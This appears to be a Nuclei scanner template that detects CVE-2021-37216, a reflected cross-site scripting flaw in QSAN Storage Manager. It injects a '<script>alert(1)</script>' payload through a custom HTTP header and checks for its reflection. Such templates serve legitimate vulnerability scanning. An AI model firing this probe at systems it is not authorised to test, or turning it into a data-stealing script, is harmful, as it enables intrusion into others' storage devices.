id: CVE-2021-37216

info:
  name: QSAN Storage Manager prior to v3.3.3 Reflected XSS
  author: dwisiswant0
  severity: medium
  description: |
    QSAN Storage Manager header page parameters does not filter special characters.
    Remote attackers can inject JavaScript without logging in and launch
    reflected XSS attacks to access and modify specific data.
  reference:
    - https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-37216
    cwe-id: CWE-79
  tags: cve,cve2021,xss,qsan,storage

requests:
  - method: GET
    path:
      - "{{BaseURL}}/http_header.php"
    headers:
      X-Trigger-XSS: "<script>alert(1)</script>"

    matchers-condition: and
    matchers:

      - type: word
        part: body
        words:
          - '"HTTP_X_TRIGGER_XSS":"<script>alert(1)</script>"'

      - type: word
        part: header
        words:
          - "text/html"

      - type: dsl
        dsl:
          - "!contains(tolower(all_headers), 'x-xss-protection')"